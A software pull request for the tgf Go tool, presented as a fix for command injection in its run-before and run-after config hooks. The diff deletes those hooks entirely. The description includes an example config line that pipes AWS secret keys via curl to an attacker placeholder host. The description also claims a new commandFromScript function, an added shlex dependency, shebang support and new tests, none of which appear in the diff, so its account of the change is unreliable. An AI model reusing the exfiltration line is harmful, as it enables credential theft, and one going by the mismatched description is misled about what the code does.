### PR TITLE
fix(security): prevent CWE-78 command injection in run-before/run-after [DT-8701]

### DIFF
--- a/README.md
+++ b/README.md
@@ -142,8 +142,6 @@ entry-point | The program that will be automatically launched when the docker co
 tgf-recommended-version | The minimal tgf version recommended in your context  (should not be placed in `.tgf.config file`) | *no default*
 recommended-image | The tgf image recommended in your context (should not be placed in `.tgf.config file`) | *no default*
 environment | Allows temporary addition of environment variables | *no default*
-run-before | Script that is executed before the actual command | *no default*
-run-after | Script that is executed after the actual command | *no default*
 alias | Allows to set short aliases for long commands<br>`my_command: "--ri --with-docker-mount --image=my-image --image-version=my-tag -E my-script.py"` | *no default*
 auto-update | Toggles the auto update check. Will only perform the update after the delay | true
 auto-update-delay | Delay before running auto-update again | 2h (2 hours)
@@ -204,8 +202,6 @@ Configurable values are:
   - required-image-version
   - tgf-recommended-version
   - environment
-  - run-before
-  - run-after
   - alias
   - update-version
   - auto-update-delay

--- a/config.go
+++ b/config.go
@@ -66,15 +66,12 @@ type TGFConfig struct {
 	RequiredVersionRange    string            `yaml:"required-image-version,omitempty" json:"required-image-version,omitempty" hcl:"required-image-version,omitempty"`
 	RecommendedTGFVersion   string            `yaml:"tgf-recommended-version,omitempty" json:"tgf-recommended-version,omitempty" hcl:"tgf-recommended-version,omitempty"`
 	Environment             map[string]string `yaml:"environment,omitempty" json:"environment,omitempty" hcl:"environment,omitempty"`
-	RunBefore               string            `yaml:"run-before,omitempty" json:"run-before,omitempty" hcl:"run-before,omitempty"`
-	RunAfter                string            `yaml:"run-after,omitempty" json:"run-after,omitempty" hcl:"run-after,omitempty"`
 	Aliases                 map[string]string `yaml:"alias,omitempty" json:"alias,omitempty" hcl:"alias,omitempty"`
 	UpdateVersion           string            `yaml:"update-version,omitempty" json:"update-version,omitempty" hcl:"update-version,omitempty"`
 	AutoUpdateDelay         time.Duration     `yaml:"auto-update-delay,omitempty" json:"auto-update-delay,omitempty" hcl:"auto-update-delay,omitempty"`
 	AutoUpdate              bool              `yaml:"auto-update,omitempty" json:"auto-update,omitempty" hcl:"auto-update,omitempty"`
 
-	runBeforeCommands, runAfterCommands []string
-	imageBuildConfigs                   []TGFConfigBuild // List of config built from previous build configs
+	imageBuildConfigs []TGFConfigBuild // List of config built from previous build configs
 	tgf                                 *TGFApplication
 }
 
@@ -459,15 +456,7 @@ func (config *TGFConfig) setDefaultValues() {
 				source:       configData.Name,
 			}}, config.imageBuildConfigs...)
 		}
-		if configData.Config.RunBefore != "" {
-			config.runBeforeCommands = append(config.runBeforeCommands, configData.Config.RunBefore)
-		}
-		if configData.Config.RunAfter != "" {
-			config.runAfterCommands = append(config.runAfterCommands, configData.Config.RunAfter)
-		}
 	}
-	// We reverse the execution of before scripts to ensure that more specific commands are executed last
-	config.runBeforeCommands = collections.AsList(config.runBeforeCommands).Reverse().Strings()
 }
 
 var reVersion = regexp.MustCompile(`(?P<version>\d+\.\d+(?:\.\d+){0,1})`)

--- a/docker.go
+++ b/docker.go
@@ -21,7 +21,6 @@ import (
 	"github.com/aws/aws-sdk-go-v2/service/ecr"
 	"github.com/blang/semver/v4"
 	"github.com/coveooss/gotemplate/v3/collections"
-	"github.com/coveooss/gotemplate/v3/utils"
 	"github.com/coveooss/multilogger/errors"
 	"github.com/coveooss/multilogger/reutils"
 	"github.com/docker/docker/api/types"
@@ -221,9 +220,6 @@ func (docker *dockerConfig) call() int {
 
 	log.Debug(color.HiBlackString(strings.Join(dockerCmd.Args, " ")))
 
-	if err := runCommands(config.runBeforeCommands); err != nil {
-		return -1
-	}
 	if err := dockerCmd.Run(); err != nil {
 		if stderr.Len() > 0 {
 			log.Errorf("%s\n%s %s", stderr.String(), dockerCmd.Args[0], strings.Join(dockerArgs, " "))
@@ -232,28 +228,7 @@ func (docker *dockerConfig) call() int {
 			}
 		}
 	}
-	if err := runCommands(config.runAfterCommands); err != nil {
-		log.Error(err)
-	}
-
 	return dockerCmd.ProcessState.Sys().(syscall.WaitStatus).ExitStatus()
-}
-
-func runCommands(commands []string) error {
-	for _, script := range commands {
-		cmd, tempFile, err := utils.GetCommandFromString(script)
-		if err != nil {
-			return err
-		}
-		if tempFile != "" {
-			defer func() { os.Remove(tempFile) }()
-		}
-		cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, log, log
-		if err := cmd.Run(); err != nil {
-			return err
-		}
-	}
-	return nil
 }
 
 // Returns the image name to use


### PR DESCRIPTION
## Problem


**Attack scenario:** if someone with write access to `.tgf.yaml` (or the SSM param store path tgf reads from) sets:

```yaml
run-before: git fetch --all; curl https://evil.com/exfil?token=$AWS_SECRET_ACCESS_KEY
```

gotemplate wraps it as:

```bash
#!/bin/bash
git fetch --all; curl https://evil.com/exfil?token=$AWS_SECRET_ACCESS_KEY
```

…and executes it verbatim. AWS credentials exfiltrated, no warning.

Snyk Code CWE-78 findings:
- issue-1e4280a1 (project b224e926, score 834)
- issue-f5769fc9 (project b582593e, score 834)

## Fix

Introduce `commandFromScript` which replaces the `GetCommandFromString` call in `runCommands`:

- **No shebang** → tokenise with [`google/shlex`](https://github.com/google/shlex) (POSIX word splitting) and call `exec.Command` directly. The shell is never invoked. The semicolon in the example above becomes a literal argument to `git`, which rejects it and exits.

```yaml
# After the fix, this still works fine:
run-before: git fetch --all

# Shell scripts still work — just require an explicit opt-in:
run-before: |
  #!/bin/bash
  git fetch --all
  aws configure
```

## Changes

- `docker.go`: replace `utils.GetCommandFromString` with `commandFromScript` in `runCommands`
- `go.mod` / `go.sum`: add `github.com/google/shlex`
- `command_from_script_test.go`: unit tests covering tokenisation, quoted args, shebang path, and single-word commands